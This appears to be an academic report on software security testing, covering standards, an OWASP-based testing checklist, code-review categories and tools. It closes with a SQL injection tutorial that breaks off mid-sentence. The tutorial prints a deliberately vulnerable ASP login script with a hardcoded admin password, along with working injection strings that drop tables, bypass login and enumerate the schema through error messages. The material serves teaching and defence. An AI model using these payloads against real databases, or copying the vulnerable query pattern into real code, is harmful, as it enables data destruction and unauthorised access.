AS/NZS 4360:2004 Risk Management - Australian Standard / New Zealand Standard AS/NZS 4360, An Australian Standards body - first issued in 1999, is the world’s first formal standard for documenting and managing risk, and is still one of the few formal standards for managing risk. It was updated in 2004. AS/NZS 4360’s approach is simple (it’s only 28 pages long) and flexible, and does not lock organizations into any particular method of risk management as long as the risk management fulfils the AS/NZS 4360 five steps. It provides several sets of risk tables and allows organizations to adopt their own.

German IT Systems S6.68, A German Standards body - Testing the effectiveness of the management system for the handling of security incidents and tests S6.67 that makes use of detection measures for security incidents

ISO 17799-2000 (BS 7799), An International Standards body - This manual fully complies with all of the remote auditing and testing requirements of BS7799 (and its International equivalent ISO 17799) for information security testing.

SET, An American Standards body - This document incorporates the remote auditing test from the SET Secure Electronic Transaction(TM)Compliance Testing Policies and Procedures, Version 4.1, February 22, 2000

NIST, An American Standards body - This manual has matched compliance through methodology in remote security testing and auditing as per the National Institute of Standards and Technology (NIST) publications. Generally Accepted Principles and Practices for Securing Information Technology systems, http://csrc.nist.gov

CVSS, An American Standards body - The US Department of Homeland Security (DHS) established the NIAC Vulnerability Disclosure Working Group, which incorporates input from Cisco, Symantec, ISS, Qualys, Microsoft, CERT/CC, and eBay. One of the outputs of this group is the Common Vulnerability Scoring System (CVSS).

OWASP, not a standards body but an Internet Open Systems Organisation - The Open Web Application Security Project (www.owasp.org) The Open Web Application Security Project (OWASP) is an open community dedicated to finding and fighting the causes of insecure software. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. OWASP is a new type of entity in the security market. Their freedom from commercial pressures allows them to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although they support the informed use of security technology.

ISECOM, Institute for Security and Open Methodologies, not a standards body but an Internet Open Systems Organisation who produce The Open Source Security Testing Methodology Manual. OSSTMM Peter V. Herzog www.isecom.org ISECOM is the OSSTMM Professional Security Tester (OPST) / OSSTMM Professional Security Analyst (OPSA) certification authority. www.opst.org - www.opsa.org

Using Standards, Methodologies or Framework to Secure Software

Testing ensures that the appropriate policy and standards are in place for the development team and that the development team creates metrics and measurement criteria. These concepts should be nothing new to development teams that adopt best practices. Documentation is extremely important, it gives development teams guidelines and policies that they can follow: People can only do the right thing if they know what the right thing is. If the application is to be developed in Java, it is essential that there is a Java secure-coding standard. If the application is to use cryptography, it is essential that there is a cryptography standard. No policies or standards can cover every situation that the development team will face. By documenting the common and predictable issues, there will be fewer decisions that need to be made during the development process, and security implementation risk will be reduced [owasp1].

In theory, development is the implementation of a design. However, many design decisions are made during code development. These are often smaller decisions that were either too detailed to be described in the design or requirements or, in other cases, issues where no policy or standards guidance was offered. Using guidelines from Risk Management standards and Methodologies, this is where checking the Software Development Life Cycle process itself to ensure that there is adequate security inherent to the process and that the successful testing program tests people, process and technology.

Example of Methodological testing approach

This Internet application test employs different software testing techniques to find security bugs in server/client applications of the system from the Internet. In this module, we refer the server/client applications to those proprietarily developed by the system owners serving dedicate business purposes and the applications can be developed with any programming languages and technologies. Example: web application for business transactions is a target in this module. Black box and/or White box testing can be used in this module.

1 Re- Engineering
1.1 Decompose or deconstruct the binary codes, if accessible.
1.2 Determine the protocol specification of the server/client application.
1.3 Guess program logic from the error/debug messages in the application outputs and program behaviours and performance.

2 Authentication
2.1 Find possible brute force password guessing access points in the applications.
2.2 Find a valid login credentials with password grinding, if possible.
2.3 Bypass authentication system with spoofed tokens.
2.4 Bypass authentication system with replay authentication information.
2.5 Determine the application logic to maintain the authentication sessions - number of (consecutive) failure logins allowed, login timeout, etc.
2.6 Determine the limitations of access control in the applications - access permissions, login session duration, idle duration.



3 Session Management
3.1 Determine the session management information - number of concurrent sessions, IP based authentication, role-based authentication, identity-based authentication, cookie usage, session ID in URL encoding string, session ID in hidden HTML field variables, etc.
3.2 Guess the session ID sequence and format
3.3 Determine the session ID is maintained with IP address information; check if the same session information can be retried and reused in another machine.
3.4 Determine the session management limitations - bandwidth usages, file download/upload limitations, transaction limitations, etc.
3.5 Gather excessive information with direct URL, direct instruction, action sequence jumping and/or pages skipping.
3.6 Gather sensitive information with Man-In-the-Middle attacks.
3.7 Inject excess/bogus information with Session-Hijacking techniques.
3.8 Replay gathered information to fool the applications.

4 Input Manipulation
4.1 Find the limitations of the defined variables and protocol payload - data length, data type, construct format, etc.
4.2 Use exceptionally long character-strings to find buffer overflows vulnerability in the applications.
4.3 Concatenate commands in the input strings of the applications.
4.4 Inject SQL language in the input strings of database-tired web applications.
4.5 Examine "Cross-Site Scripting" in the web applications of the system.
4.6 Examine unauthorized directory/file access with path/directory traversal in the input strings of the applications.
4.7 Use specific URL-encoded strings and/or Unicode-encoded strings to bypass input validation mechanisms of the applications.
4.8 Execute remote commands through "Server Side Include"
4.9 Manipulate the session/persistent cookies to fool or modify the logic in the server-side web applications.
4.10 Manipulate the (hidden) field variable in the HTML forms to fool or modify the logic in the server side web applications.
4.11 Manipulate the "Referrer", "Host", etc. HTTP Protocol variables to fool or modify the logic in the server-side web applications.
4.12 Use illogical/illegal input to test the application error-handling routines and to find useful
4.13 debug/error messages from the applications.

5 Output Manipulation
5.1 Retrieve valuable information stored in the cookies
5.2 Retrieve valuable information from the client application cache.
5.3 Retrieve valuable information stored in the serialized objects.
5.4 Retrieve valuable information stored in the temporary files and objects

6 Information Leakage
6.1 Find useful information in hidden field variables of the HTML forms and comments in the HTML documents.
6.2 Examine the information contained in the application banners, usage instructions, welcome messages, farewell messages, application help messages, debug/error messages, etc.


D) The Top Ten

Testing for bugs is easy if you know how. That is, the experienced testing team, as a resource would a have knowledgebase of common (and not so common) security flaws and would know how to test for them. This knowledge comes with experience but also from research like the concept of the Top Ten Web application security vulnerabilities published by the Open Web Application Security Project (OWASP) www.owasp.org which covers the prevention of common coding vulnerabilities in software development processes. The testing team using their own knowledgebase and resources like this are an invaluable tool that could be updated as new coding vulnerabilities are discovered.

OWASP Top Ten Most Critical Web Application Security Vulnerabilities http://www.owasp.org/documentation/topten.html

A1 Un-validated Input Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack backend components through a web application.
A2 Broken Access Control Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions.
A3 Broken Authentication and Session Management Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.
A4 Cross Site Scripting (XSS) Flaws The web application can be used as a mechanism to transport an attack to an end user's browser. A successful attack can disclose the end user?s session token, attack the local machine, or spoof content to fool the user.
A5 Buffer Overflows Web application components in some languages that do not properly validate input can be crashed and, in some cases, used to take control of a process. These components can include CGI, libraries, drivers, and web application server components.
A6 Injection Flaws Web applications pass parameters when they access external systems or the local operating system. If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.
A7 Improper Error Handling Error conditions that occur during normal operation are not handled properly. If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.
A8 Insecure Storage Web applications frequently use cryptographic functions to protect information and credentials. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.
A9 Denial of Service Attackers can consume web application resources to a point where other legitimate users can no longer access or use the application. Attackers can also lock users out of their accounts or even cause the entire application to fail.
A10 Insecure Configuration Management Having a strong server configuration standard is critical to a secure web application. These servers have many configuration options that affect security and are not secure out of the box.

Araujo and Curphey [Curphey 06] suggest when looking at the security-significant areas of the code base to drafting a simple frame of reference and checklists that let a person auditing the code go about his task in the best possible manner. The Eight vulnerability categories Inspections allow development teams to leverage the biggest advantage they have over attackers, that is, in-depth knowledge of the design, architecture and source code. Each section of code is reviewed for vulnerabilities and threats that belong to the following widely accepted vulnerability categories:

Configuration Management:

As part of this category, consider all issues that stem from unsecure configurations and deployment. For instance, it is important to review the web.config file for all ASP.Net applications to check any authentication and/or authorization rules embedded there. Another common configuration flaw to look out for is how the framework and application deal with errors, especially whether detailed error messages are propagated back to the client. Similarly, it is important to ensure that by default, debug information and debugging are disabled. Other examples of such configuration settings include the validateRequest and EnableViewStateMac directives in ASP.Net. Configuration management checks also include verifying the default permission sets on file system and database-based resources, such as configuration files, log files and database tables.

Cryptography:

This category deals with protection of data both in storage and in transit. The nature of issues that are covered in this category include whether sensitive information such as social security numbers, user credentials or credit card information is being transmitted in the clear or stored as plaintext in the database. It is also important to ensure that all cryptographic primitives being used are well-known, well-documented and publicly scrutinized algorithms and that key lengths meet industry standards and best practices. For instance, ensure that the developers are using strong algorithms like AES (RSA for public key deployments) with key lengths of 128 bit (2048 bit for asymmetric keys) at a minimum. Similarly, ensure that cryptographically strong sources of randomness are being used to generate keys, session IDs and other such tokens. For instance, the use of the rand/Math.Random to generate an authentication token should be flagged as a flaw because these are easily guessable. Instead, the developers should use classes such as SecureRandom or cryptographic APIs like Microsoft CAPI.
Authentication:

Consider the lack of strong protocols to validate the identity of a user or component as part of this category. Other issues that must be considered include the possibility or potential for authentication attacks such as brute-force or dictionary-based guessing attacks. If account lockouts are implemented, it is important to consider the potential for denial of service, that is, can an attacker lock out accounts permanently and, most importantly, can they lock out the administrative accounts. The quality or the lack of a password policy also must be reviewed for adherence to enterprise or industry requirements and best practices.

Authorization:

The types of issues that are considered under this category include those dealing with the lack of or appropriate mechanisms to enforce access control on protected resources in the system. For instance, can a malicious user elevate his her privilege by changing an authorization token, or can a business-critical piece of data, such as the price of a product in an e-commerce application, be tampered by the attacker. One of the most common findings we discover is the so-called “admin token.” These are special tokens or flags that if passed to the application causes it to launch the administrative interface, disable all security checks or allow unfettered access in some form. The developers typically introduce these to aid in debugging and either forget to take them out from production systems or assume no one will find them. Authorization flaws typically result in either horizontal or vertical privilege escalation. These flaws represent the biggest category of problems we find in working with our clients.

Session Management:

This category includes all those issues that deal with how a user’s session is managed within the application. Typical issues to look out for here include determining whether a session token can be replayed to impersonate the user and whether sessions time-out after an extended period of inactivity. Session isolation is also an important consideration. The reviewers must ensure that a user is only provided with information from within his own session and that he cannot intrude into the session of another user. It is also important to ensure that session tokens are random and not guessable.

Data Validation:

This is the category responsible for the most well known bugs and flaws, including buffer overflows, SQL injection and cross-site scripting. The reviewers must ensure that all data that comes from outside the trust boundary4 of a component is sanitized and validated. Data sanitization includes type, format, length and range checks. It is especially important to check for how the application deals with non-canonicalized data, data that is UNICODE encoded. The code reviewers should check for use of output validation, which is critical and recommended for dealing with problems such as cross-site scripting. Also, if the application is to be internationalized or localized for a specific language, the impact on regular expression validators and the application in general must be verified. Auditors must scan for any instances of SQL queries being constructed dynamically using string concatenation of parameters obtained from the user. These represent the most common attack vector for SQL and other injection attacks. It is also important to ensure that any stored procedures being used do not operate in an unsafe manner. For example, that they do not use string parameters and the exec call to execute other stored procedures.

Exception Management:

This category is responsible for ensuring that all failure conditions, such as errors and exceptions, are dealt with in a secure manner. The nature of issues covered in this category range from detailed error messages, which lead to information disclosure, to how user-friendly security error messages are. For instance, do these messages clearly indicate the security and usability implications of their decision and are they are provided with enough information to make that decision? The code-reviewing team must ensure that exception handlers wrap all security-significant operations such as database operations and cryptography. The reviewers also must ensure that page- and application-level exception handlers are set.

Auditing and Logging:

The final category of issues discovered during code inspection is concerned with how information is logged for debugging and auditing purposes. For instance, are all security sensitive operations being logged to create an audit trail? This includes, but is not restricted to, failed and successful logons, impersonation, privilege elevation, change of log setting or clearing the log, cryptographic operations and session lifetime events. The review team also must ensure that log files cannot be modified, deleted or cleared by unauthorized users. Another common issue we find is when too much information is being logged, leading to sensitive information disclosure. It is important to verify that the logging capabilities cannot be used in a resource-exhaustion attack on the server through excessive logging without any form of quotas or log-archiving policies. Finally, especially when logs can be viewed by administrators within the same application, the team must ensure that no cross-site scripting tags can be inserted into the log files. The code-inspection team may choose to review each section of code for all the categories above or alternatively apply each category to the entire code base. In our experience, the latter tends to be more effective with larger code bases in which the code-review team is not attempting for 100% code coverage. For smaller projects in which the team will review every line of code, it is usually more effective and efficient to use the former. Once the code-inspection process has been completed and the findings documented, it is important to consider how to go about dealing with the resulting issues. At this stage it is important to be strategic rather than tactical. If possible patch solutions must be avoided. The findings must be reviewed to determine what the root causes are. If the team finds the majority of the issues are because developers are not adhering to best practices and policies, then chances are they have not been made adequately aware of these and they must be better informed. Similarly, if a majority of the flaws are related to authorization then training in role-based access control or other authorization best practices might be in order. We find patch solutions often tend to deal with specific issues and thus either lead to further problems or do not fix the core issue and hence the issue can be exploited through a different attack vector.

E) Good Programming Techniques

Programmers share information about programming techniques and best practice. These techniques are informally peer reviewed within user groups, seminars and the Internet. With security in mind, the appendix describes two such techniques: Appendix 1) how to avoid SQL injection attacks and Appendix 2) good .NET application programming. An overview of SQL injection is given here:

By the late 1990s, new threats were emerging that began to leverage the power and complexity of new Internet applications. Organizations added more and more functionality to their Web sites, increasing the complexity of information systems connected to the Internet. Hackers moved beyond the traditional methods of attacking operating systems and began attacking the applications themselves. Script kiddies had a rich selection of tools at their disposal that could find and exploit a growing number of vulnerabilities on any device or application connected to the Internet. The attacks on applications came in many forms. One was the SQL-injection attack, in which an individual would insert portions of SQL statements into Web forms in the hope of tricking the application into yielding some otherwise hidden information or performing some forbidden function. [Gregory 03]
























(Fig 4)

This screen shot shows the values a hacker might enter into a form to try to get at hidden information or perform a forbidden function. These new kinds of attacks posed a difficult challenge for IT managers in the ’90s, for they had few defences available. Firewalls were not designed to decode, understand and make pass-or-fail decisions about the content deep inside network packets. Intrusion Detection Systems could recognize some of these attacks, but since they were merely monitoring devices, they were powerless to stop them. SQL Injection SQL Injection can occur with every form of database access. However, some forms of SQL injection are harder to prevent than others.

F) Password Cracking

Password cracking programs can be used to identify weak passwords. Password cracking verifies that users are employing sufficiently strong passwords. However since there are so many possibilities it can take months to crack a password. Theoretically all passwords are “crackable” from a brute force attack given enough time and processing power. Penetration testers and attackers often have multiple machines to which they can spread the task of cracking password. Multiple processors greatly shorten the length of time required to crack strong passwords. The following actions can be taken if an unacceptably high number of passwords can be cracked:

If the cracked passwords were selected according to policy, the policy should be modified to reduce the percentage of crackable passwords. If such policy modification would lead to users writing down their passwords because they are difficult to memorize, an organization should consider replacing password authentication with another form of authentication.

If cracked passwords were not selected according to policy, the users should be educated on possible impacts of weak password selections. If such violations by the same users are persistent, management should consider additional steps (additional training, password management software to enforce better choices, deny access, etc.) to gain user compliance. Many server platforms also allow the system administrator to set minimum password length and complexity.

G) Social Engineering

Social engineering is the technique of using persuasion and/or deception to gain access to, or information about, information systems. It is typically implemented through human conversation or other interaction. The usual medium of choice is telephone but can also be e-mail or even face-to-face interaction. Social engineering generally follows two standard approaches. In the first approach the penetration tester poses as a user experiencing difficultly and calls the organization’s help desk in order to gain information on the target network or host, obtain a login ID and credentials, or get a password reset. The second approach is to pose as the help desk and call a user in order to get the user to provide his/her user id(s) and password(s). This technique can be extremely effective. + Psychological Acceptability—Users should understand the necessity of security. This can be provided through training and education. In addition, the security mechanisms in place should present users with sensible options that will give them the usability they require on a daily basis. If users find the security mechanisms too cumbersome, they find ways to work around or compromise them. An example of this is using random passwords that are very strong but difficult to remember; users may write them down or looks for methods to circumvent the policy.

Who are Contributors?

A) The Institute for Security and Open Methodologies (ISECOM ) produce The Open Source Security Testing Methodology Manual (OSSTMM). This test performs tests in accordance to the Open Source Security Testing Methodology available at http://www.osstmm.org/ and hereby stands within best practices of security testing. The objective of this manual is to create one accepted method for performing a thorough security test. Details such as the credentials of the security tester, the size of the security firm, financing, or vendor backing will impact the scale and complexity of our test – but any network or security expert who meets the outline requirements in this manual will have completed a successful security profile. You will find no recommendation to follow the methodology like a flowchart. It is a series of steps that must be visited and revisited (often) during the making of a thorough test. The methodology chart provided is the optimal way of addressing this with pairs of testers however any number of testers are able to follow the methodology in tandem. What is most important in this methodology is that the various tests are assessed and performed where applicable until the expected results are met within a given time frame.

B) Open Web Application Security Project (OWASP) (www.owasp.org) consists of: the Guide – This document that provides detailed guidance on web application security. Top Ten Most Critical Web Application Vulnerabilities – A high-level document to help focus on the most critical issues. Metrics – A project to define workable web application security metrics. Legal – A project to help software buyers and sellers negotiate appropriate security in their contracts. Testing Guide – A guide focused on effective web application security testing. ISO17799 – Supporting documents for organizations performing ISO17799 reviews. AppSec FAQ – Frequently asked questions and answers about application security.

C) NGS (Next Generation Security) Software Ltd (www.ngssoftware.com) security researchers, Enterprise level application vulnerability research and database security. NGS are a computer security provider.

D) Secure Software, Inc. (http://www.securesoftware.com/) Identifying, assessing and correcting software vulnerabilities throughout the development life cycle. Over all project performance and policy compliance with detailed information about security vulnerabilities that affect the programs they’re responsible for and can highlight security problems.

E) Foundstone (www.foundstone.com) a disision of McAfee. Demonstarte vulnerability Management solutions and Regulatory Compliance Templates to ensure government and industry regulations and prepare for compliance audits. S3i .NET Security Toolkit

F) Computer Associates International, Inc., http://www.ca.com, producers of Security Management Software that enables Security Control through Policy-Based Management and unify Compliance Processes and Change


Tools

OWSAP - The following four tools comes from OWASP (www.owasp.org)

WebScarab a web application vulnerability assessment suite including proxy tools
Validation Filters(Stinger for J2EE, filters for PHP) generic security boundary filters that developers can use in their own applications
WebGoat an interactive training and benchmarking tool that users can learn about web application security in a safe and legal environment
DotNet a variety of tools for securing .NET environments.


Foundstone - Foundstone produce a free tool .NETMon which is also part of the not for free larger Foundstone S3I, .Net Security Toolkit3. It watches the .NET Common Language Runtime (CLR) and watches how security is enforced by the .NET framework by bespoke code. This tool is one of many that have been developed at Foundstone to help code review teams and software security professionals. This tool is a code profiler for the .Net application, including those that use ASP.Net. Can check what calls are being made to the System. Security namespace and whether access control checks are being made before any access is allowed to a protected resource. This is useful in finding blind spots and backdoors where authorization checks maybe bypassed.

Secures Software’s CodeAssure 2.0 Secures Software Development, aims to provide a comprehensive, process-oriented method of identifying, assessing and correcting software vulnerabilities throughout the development life cycle. CodeAssure 2.0 introduces the CodeAssure Management Center, which offers enterprise-wide visibility into overall project performance and policy compliance. “CodeAssure Management Center provides developers — and their managers — with detailed information about security vulnerabilities that affect the programs they’re responsible for and can highlight security problems that can delay acceptance and deployment of code in production environments,” says Dale Gardner, director of product management. As software projects are analyzed, CodeAssure Management Center gathers results. Developers or their managers can then select from a variety of pre-defined reports, offering varying levels of detail and addressing the different information needs of individuals throughout the organization, to understand the current security status of an application and how it has changed over time. CodeAssure 2.0 uses sophisticated static analysis technologies and a comprehensive knowledgebase of security defects to automatically highlight unsecure code and manage remediation during the development process. The product comprises three main components: CodeAssure Workbench; CodeAssure Integrator; and CodeAssure Management Center. The first two, Gardner says, are focused on performing security assessments, while the other delivers reporting and policy-checking capabilities to the entire organization. Workbench and Integrator both incorporate the product’s analysis engine, which combines a flow-sensitive analysis with a comprehensive vulnerability knowledgebase to produce the most accurate assessments possible. The analysis engine performs a complete data flow and control flow assessment of the entire program. Workbench, a plug-in to Eclipse, integrates the analysis engine directly into Eclipse. Integrator exposes a command-line interface to the analysis engine. The CodeAssure Management Center provides a real-time, Web-based reporting and policy compliance system to answer security questions. Pricing for CodeAssure 2.0 starts at $48,000 for a 10-developer deployment.

Computer Associates’s eTrust IAM Toolkit Builds Identities Into Apps The eTrust Identity and Access Management Toolkit (eTrust IAM Toolkit) Enables developers to build consistent and manageable identity-based security within their business applications. Aimed at enabling policy-based security management, at unifying the compliance process and improvement responsiveness in change management. eTrust IAM Toolkit provides a software development kit that lets developers embed a common set of fine-grained, identity-based security controls within applications. It can be implemented with a range of third-party provisioning and identity-management tools, as well as with CA’s own eTrust security product line. Uses a standard approach throughout an organization for building application authentication and authorization, and for centralizing the management of identities and application access policies. Pricing for the eTrust IAM Toolkit starts at $5,000. For more information, go to: ca.com/etrust/iam_toolkit

Parasoft’s JContract (www.parasoft.com )a Design by Contract (DbC) DbC formal way of using comments to incorporate specification information into the code itself. Basically, the code specification is expressed unambiguously using a formal language that describes the code's implicit contracts. These contracts specify such requirements as: Conditions that the client must meet before a method is invoked. Conditions that a method must meet after it executes. Assertions that a method must satisfy at specific points of its execution.

SPI Dynamics(www.spidynamics.com) WebInspect application security assessment tool - web security and the security of your most critical information by identifying known and unknown vulnerabilities WebInspect complements firewalls and intrusion detection systems by identifying Web application vulnerabilities available for use in a test environment and in the real world. Reinforcement of coding policies, performed at all stages of the application lifecycle.

RATS2 - Among the free scanners, one of the most popular scanners is RATS2. These tools can primarily be classified into static or dynamic analysis tools. The static tools essentially scan the code for unsafe functions and other language constructs. These typically are far more effective with unmanaged languages such as C and C++ where the list of unsafe functions is well documented. Dynamic analysis tool makers claim that their tools compile the source and determine call graphs and dataflow patterns to provide a lower false-positive and -negative rate than their static analysis counterparts.

Tools Evaluation

Testing towards the discovery of unknown vulnerabilities is not possible. But security tests can describe tests of known vulnerabilities, information leaks, and deviations from law, industry standards, and best practices. A security test is a point in time view of and present the output from their tests as a snapshot in time.

Tools have limited effectiveness. While they are useful in finding low level problems they rarely are effective in finding complex flaws due mainly to design and top level Software Development Life Cycle processes that don’t make enough consideration of security testing. Further, they lack handling of managed languages such as Java and C#, which can hide issues such as buffer overflows. For instance, a tool used to scan code can report critical findings but manual code review revealed far more significant and exploitable issues.

Web application scanners crawl across Web and find security bugs acting like an automatic hacker. While they may have a place in a testing program, automating black-box testing will never be totally effective. Tools are the last thing to turn to test the problem, not the first. Not to discourage tools, rather that their limitations should be understood, and testing frameworks should be planned appropriately.

Mythologies, Standards or Frameworks aim to prove that adequate controls are in place and that senior management believes the controls are effective. They audit against an agreed standard and then accredit the application as adhering to best practices of security testing. But, that is exactly and only what it does.

Conclusion

Only one in ten companies in the UK, and only one in four large businesses, have staff with formal information security qualifications [Kellet 04] and often support is outsourced and the employees of the outsourced company have access to information that may be sensitive or believed to be protected. Building secure software means building better software. Testing the security of software means testing the software development life cycle, which in turn means testing the people, process and the technology.

Despite all attempts at thoroughness and efficiency, one of the largest factors about determining the success of a security is still based on economics and budgets for security defence remain small. If inefficient security testing becomes too costly it is tempting for an organization to see security testing as an extraneous cost. This is unfortunate because the risks associated from not conducting security testing still remains unknown. However the results will time and time again speak for themselves and organizations will view security testing as cost justified.

Testing only the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people and, most importantly, the process, you can catch issues that would later manifest themselves into defects in the technology and eradicating security issues early and identify the root causes of defects.

Code review using threat modelling and security code inspection, is the only effective way to perform a thorough analysis of your application’s code base to find the maximum vulnerabilities and other security issues. This also represents an effective way to integrate security into your software development life cycle. More importantly, once fully understood and integrated into the development process these can be invaluable tools to improve quality.


Further Work

While high level solutions to software security such as reviewing SDLC processes or using risk analysis are useful (and sometimes required), ultimately it is the programmer who writes the code. Programmers write code using core and fundamental principles taught to him or her.

These fundamental principles, that have been taught and learned over the decades, were formed without security in mind. That is, there is a underlining assumption that software algorithms are immune to security threat. Example: the bubble sort algorithm sorts a list by comparing each adjacent pair of items in a list in turn, swapping the items if necessary, and repeating the pass through the list until no swaps are done. The binary nature of software principles declare that object O is in state x or y. There is no third state, no excluded middle. The assumption is that the objects in the cells of the list are supposed to be there; security is irrelevant. Perhaps further study could be carried out on well known (and proven?) software algorithms with security in mind.

Core and fundamental software constructs of stdout and stderr have been used by hackers to fingerprint database applications. The hacker uses the well intentioned messages from stdout and stderr to get clues on how to attack. Verbose front-ends, trying to assist but end up compromising the whole system. Perhaps a review of the three operating system streams stdin, stdout and stderr could be reviewed with security in mind.

Appendix 1 SQL Injection

Most applications including games, accounting, management, business, and mission critical systems use a database. Databases are also known as the biggest security problem in developing application and are at risk of SQL injection. SQL injection attacks are popular when the application is run on the Web. Hackers can attempt to access your system by entering an SQL query that can break your system. Most Web application needs a username and password to login. And the container that stores all of the data is on database. A lot of information and credentials are held on the database. So determining that the database is secure is very important in building application.
Basically, SQL injection is the means by which a user can pass malicious code to a database by injecting their own code into your SQL statement by passing parts of an SQL statement to your query via an online form.
SQL injection is a technique for exploiting web applications that use client-supplied data in SQL queries without stripping potentially harmful characters first. Despite being remarkably simple to protect against, there is an astonishing number of production systems connected to the Internet that are vulnerable to this type of attack.
SQL Injection occurs when an attacker is able to insert a series of SQL statements into a 'query' by manipulating data input into an application. A typical SQL statement looks like this:
select id, forename, surname from authors;
This statement will retrieve the 'id', 'forename' and 'surname' columns from the 'authors' table, returning all rows in the table. The 'result set' could be restricted to a specific 'author' like this:
select id, forename, surname from authors where forename = 'Kurniawan' and surname = 'Daud';
An important point to note here is that the string literals 'Kurniawan' and 'Daud' are delimited with single quotes. Presuming that the 'forename' and 'surname' fields are being gathered from user-supplied input, an attacker might be able to 'inject' some SQL into this query, by inputting values into the application like this:
Forename: Kur’n and Surname: Daud
The 'query string' becomes this:
select id, forename, surname from authors where forename = ' Kur’n ' and

Surname = 'Daud'
When the database attempts to run this query, it is likely to return an error:
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'Kur'.
The reason for this is that the insertion of the 'single quote' character 'breaks out' of the single-quote delimited data. The database then tried to execute 'Kur' and failed. If the attacker specified input like this:
Forename: Kur'; drop table authors
It would seem that some method of either removing single quotes from the input, or 'escaping' them in some way would handle this problem. This is true, but there are several difficulties with this method as a solution. First, not all user-supplied data is in the form of strings. If our user input could select an author by 'id' (presumably a number) for example, our query might look like this:
select id, forename, surname from authors where id=1234
In this situation an attacker can simply append SQL statements on the end of the numeric input. In other SQL dialects, various delimiters are used; in the Microsoft Jet DBMS engine, for example, dates can be delimited with the '#' character. Second, ‘escaping’ single quotes are not necessarily the simple cure it might initially seem. More Detail in ASP Pages - to illustrate this, build a sample Active Server Pages (ASP) 'login' page, which accesses a SQL Server database and attempts to authenticate access to some fictional application.
This is the code for the 'form' page, into which the user types a username and password:



Login Page


Login



Username:
Password:






This is the code for 'process_login.asp', which handles the actual login:



<%@LANGUAGE = JScript %>
<%
function trace( str )
{
if( Request.form("debug") == "true" )
Response.write( str );
}
function Login( cn )
{
var username;
var password;
username = Request.form("username");
password = Request.form("password");
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>

ACCESS DENIED


<%
Response.end
return;
}
else
{
Session("username") = "" + rso("username");
%>

ACCESS GRANTED




Welcome,
<% Response.write(rso("Username"));
Response.end
}
}
function Main()
{
//Set up connection
var username
var cn = Server.createobject( "ADODB.Connection" );
cn.connectiontimeout = 20;
cn.open( "localserver", "sa", "password" );
username = new String( Request.form("username") );
if( username.length > 0)
Login( cn );
cn.close();
}
Main();
%>



The critical point here is the part of 'process_login.asp' which creates the 'query string’:
sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
If the user specifies the following:
Username: '; drop table users--
Password:
The 'users' table will be deleted, denying access to the application for all users. The '--' character sequence is the 'single line comment' sequence in Transact-SQL, and the ';' character denotes the end of one query and the beginning of another. The '--' at the end of the username field is required in order for this particular query to terminate without error.
The attacker could log on as any user, given that they know the users name, using the following input:
Username:admin'—
The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1—
And strangely, the attacker can log in as an entirely fictional user with the following input:
Username: ' union select 1, 'fictional_user', 'some_password', 1—
The reason this works is that the application believes that the 'constant' row that the attacker specified was part of the record set retrieved from the database.
Obtaining Information Using Error Message - This technique was first discovered by David Litchfield and the author in the course of a penetration test. David later wrote a paper on the technique [WAD David], and subsequent authors have referenced this work. This explanation discusses the mechanisms underlying the 'error message' technique, enabling the reader to fully understand it, and potentially originate variations of their own. In order to manipulate the data in the database, the attacker will have to determine the structure of certain databases and tables. For example, our 'users' table might have been created with the following command:

create table users
(
id int,
username varchar(255),
password varchar(255),
privs int
)

and had the following users inserted:

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff ) ;
insert into users values( 1, 'guest', 'guest', 0x0000 ) ;
insert into users values( 2, 'chris', 'password', 0x00ff );
insert into users values( 3, 'fred', 'sesame', 0x00ff );


Let's say our attacker wants to insert a user account for himself. Without knowing the structure of the 'users' table, he is unlikely to be successful. Even if he gets lucky, the significance of the 'privs' field is unclear. The attacker might insert a '1', and give himself a low - privileged account in the application, when what he was after was administrative access. Fortunately for the attacker, if error messages are returned from the application (the default ASP behaviors) the attacker can determine the entire structure of the database, and read any value that can be read by the account the ASP application is
using to connect to the SQL Server.

How this Works - First, the attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:

Username: ' having 1=1—

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/process_login.asp, line 35

So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:

Username: ' group by users.id having 1=1—

This produces this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /process_login.asp, line 35

Eventually the attacker arrives at the following 'username':

' group by users.id, users.username, users.password, users.privs having 1=1—

which produces no error, and is functionally equivalent to:

select * from users where username = ''

So the attacker now knows that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs', in that order.


It would be useful if he could determine the types of each column. This can be achieved using a 'type conversion' error message, like this:

Username: ' union select sum(username) from users—

This takes advantage of the fact that SQL server attempts to apply the 'sum' clause before determining whether the number of fields in the two row sets is equal. Attempting to calculate the 'sum' of a textual field results in this message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

which tells us that the 'username' field has type 'varchar'. If, on the other hand, we attempt to calculate the sum() of a numeric type, we get an error message telling us that the number of fields in the two rowsets don't match:

